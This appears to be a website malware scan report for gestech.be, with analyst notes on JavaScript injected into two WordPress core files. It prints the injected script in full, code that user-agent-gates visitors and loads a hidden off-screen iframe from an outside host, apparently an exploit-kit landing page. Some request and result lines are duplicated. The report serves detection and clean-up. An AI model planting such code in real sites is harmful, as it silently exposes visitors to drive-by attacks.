Scanned pages/files
Request | Server response | Status |
http://gestech.be/ | 200 OK Content-Length: 12340 Content-Type: text/html | clean |
http://gestech.be/wp-includes/js/comment-reply.min.js?ver=3.6 | 200 OK Content-Length: 967 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Analyst note: the script appended to this file reads the "lastshow" cookie and inspects navigator.userAgent; only when the user agent contains neither "Chrome" nor "IEMobile" but does contain "Windows" (effectively Windows browsers other than Chrome) and the cookie is absent, it document.write()s a 140x140 iframe loading hxxp://bigahuresa[.]sarahlai[.]com/lordesman15.html, positioned at top:-889px;left:-889px so it is off-screen and invisible to the visitor, then sets lastshow=1 for 64 hours so each victim receives the payload only once. User-agent gating plus a one-shot cookie is consistent with an exploit-kit landing page being loaded silently; treat the sarahlai.com host as an indicator of compromise and block it at the proxy/DNS. function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (!ulrcont && bb) { document.write('<iframe src="http://bigahuresa.sarahlai.com/lordesman15.html?" style="border-style:dashed;position:absolute;top:-889px;left:-889px;" height="140" width="140"></iframe>'); var date = new Date( new Date().getTime() + 64*60*60*1000 ); document.cookie="lastshow=1; path=/; expires="+date.toUTCString(); } } Visitrepositorium(); Antivirus reports:
| ||
http://gestech.be/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 94095 Content-Type: application/javascript | clean |
http://gestech.be/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8167 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Analyst note: the listing below is the same getCookie/Visitrepositorium injection reported for comment-reply.min.js above, shown here truncated after the cookie check (the document.write of the hidden iframe is not reproduced in this excerpt). Both affected files live under wp-includes/js/, i.e. WordPress core files, which implies the attacker had write access to the web root; replace the files from a clean WordPress distribution rather than trimming the appended script, check the rest of the install for further modifications, and rotate the hosting/admin credentials. function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); Antivirus reports:
| ||
http://gestech.be/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.39.0-2013.07.31 | 200 OK Content-Length: 14611 Content-Type: application/javascript | clean |
http://gestech.be/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.5.1 | 200 OK Content-Length: 8326 Content-Type: application/javascript | clean |
http://gestech.be/le-gestech-pour-mon-sel/ | 200 OK Content-Length: 11428 Content-Type: text/html | clean |
http://gestech.be/le-gestech-pour-mon-sel/demo/ | 200 OK Content-Length: 12343 Content-Type: text/html | clean |
http://gestech.be/le-gestech-pour-mon-sel/faq/ | 200 OK Content-Length: 18310 Content-Type: text/html | clean |
http://gestech.be/le-gestech-pour-mon-sel/demander-le-gestech/ | 200 OK Content-Length: 16480 Content-Type: text/html | clean |
http://gestech.be/installation/ | 200 OK Content-Length: 19035 Content-Type: text/html | clean |
http://gestech.be/installation/telechargement/ | 200 OK Content-Length: 13528 Content-Type: text/html | clean |
http://gestech.be/installation/importation-des-donnees/ | 200 OK Content-Length: 17178 Content-Type: text/html | clean |
http://gestech.be/installation/configuration/ | 200 OK Content-Length: 14815 Content-Type: text/html | clean |
http://gestech.be/support/ | 200 OK Content-Length: 13561 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gestech.be
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Aug 2014 19:22:08 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: startBAK=R3415745932; path=/; expires=Tue, 26-Aug-2014 20:27:33 GMT
Set-Cookie: start=R3918429717; path=/; expires=Tue, 26-Aug-2014 20:29:30 GMT
X-Pingback: http://gestech.be/xmlrpc.php
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: gestech.be
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 26 Aug 2014 19:22:08 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: startBAK=R3415745932; path=/; expires=Tue, 26-Aug-2014 20:27:33 GMT
Set-Cookie: start=R3918429717; path=/; expires=Tue, 26-Aug-2014 20:29:30 GMT
X-Pingback: http://gestech.be/xmlrpc.php
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: gestech.be
Referer: http://www.google.com/search?q=gestech.be
Result:
The result is similar to the first query: no referer-conditional redirect was observed. This does not clear the site, since the injected script found in the two JavaScript files above is present independently of this redirect check. Note also that the responses above disclose `Server: Apache` and `X-Powered-By: PHP/5.2.17` (PHP 5.2 is end-of-life and no longer receives security fixes), and the `?ver=3.6` query string on a core script suggests WordPress 3.6; these version disclosures should be addressed as part of the clean-up.
GET / HTTP/1.1
Host: gestech.be
Referer: http://www.google.com/search?q=gestech.be
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gestech.be
Result: This site is not currently listed as suspicious. (A clean Safe Browsing status only means the blacklist provider has not yet detected the injection; the scan above found malicious code, so this should not be read as a clean bill of health.)
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gestech.be/
Result: gestech.be is not infected or malware details are not published yet. (As with Safe Browsing, blacklist status lags behind actual infection; the injected script detected above is the authoritative finding here.)
Result: gestech.be is not infected or malware details are not published yet.